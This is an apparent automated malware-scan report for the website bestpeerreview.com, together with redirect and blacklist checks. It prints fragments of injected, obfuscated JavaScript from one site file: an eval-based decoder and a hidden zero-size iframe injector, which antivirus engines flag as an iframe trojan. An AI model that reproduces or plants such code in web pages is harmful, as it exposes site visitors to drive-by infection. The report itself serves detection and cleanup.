New scan:

Malware Scanner report for bestpeerreview.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://bestpeerreview.com/
200 OK
Content-Length: 13198
Content-Type: text/html
clean
http://bestpeerreview.com/misc/jquery.js?t
200 OK
Content-Length: 31089
Content-Type: application/x-javascript
clean
http://bestpeerreview.com/misc/drupal.js?t
200 OK
Content-Length: 9834
Content-Type: application/x-javascript
clean
http://bestpeerreview.com/sites/all/modules/nice_menus/nice_menus.js?t
200 OK
Content-Length: 1724
Content-Type: application/x-javascript
clean
http://bestpeerreview.com/sites/all/modules/panels/js/panels.js?t
200 OK
Content-Length: 797
Content-Type: application/x-javascript
clean
http://bestpeerreview.com/sites/all/modules/swftools/shared/swfobject2/swfobject.js?t
200 OK
Content-Length: 10220
Content-Type: application/x-javascript
clean
http://bestpeerreview.com/sites/all/themes/pa/js/general.js
200 OK
Content-Length: 7890
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function bookmark(url,title){
if (window.sidebar) window.sidebar.addPanel(title, url, "");
else if(window.opera && window.print){ var elem = document.createElement('a');
elem.setAttribute('href',url);
elem.setAttribute('title',title);
elem.setAttribute('rel','sidebar');
elem.click();
} else if(document.all) { window.external.AddFavorite(url, title);
} else {
alert("Press CTRL-D to bookmark");
}
}try{prototype%2;}catch(as
... 6894 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Decoded script:


j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
... 32997 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

nProtect
JS:Trojan.Iframer.C
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Iframer.C (B)
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
MicroWorld-eScan
JS:Trojan.Iframer.C
F-Secure
JS:Trojan.Iframer.C
F-Prot
JS/IFrame.QW
GData
JS:Trojan.Iframer.C
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Iframer.C

http://bestpeerreview.com/form/live-support
200 OK
Content-Length: 8942
Content-Type: text/html
clean
http://bestpeerreview.com/rss.xml
200 OK
Content-Length: 8517
Content-Type: application/rss+xml
clean
http://bestpeerreview.com/test404page.js
404 Not Found
Content-Length: 4763
Content-Type: text/html
clean
http://bestpeerreview.com/products
200 OK
Content-Length: 18343
Content-Type: text/html
clean
http://bestpeerreview.com/about-us
200 OK
Content-Length: 7737
Content-Type: text/html
clean
http://bestpeerreview.com/form/contact-us
200 OK
Content-Length: 9606
Content-Type: text/html
clean
http://bestpeerreview.com/client-experiences
200 OK
Content-Length: 8389
Content-Type: text/html
clean
http://bestpeerreview.com/security
200 OK
Content-Length: 7279
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bestpeerreview.com

Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 09:37:11 GMT
Server: Apache/2.0.52 (Novell)
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 09:37:11 GMT
Set-Cookie: SESS81f6b99a1113d6b75f082f4de7ee78ad=4ant87g40g7d80gjapscabmqk4; expires=Thu, 10 Jul 2014 13:10:31 GMT; path=/; domain=.bestpeerreview.com
Second query (visit from search engine):
GET / HTTP/1.1
Host: bestpeerreview.com
Referer: http://www.google.com/search?q=bestpeerreview.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bestpeerreview.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bestpeerreview.com/

Result: bestpeerreview.com is not infected or malware details are not published yet.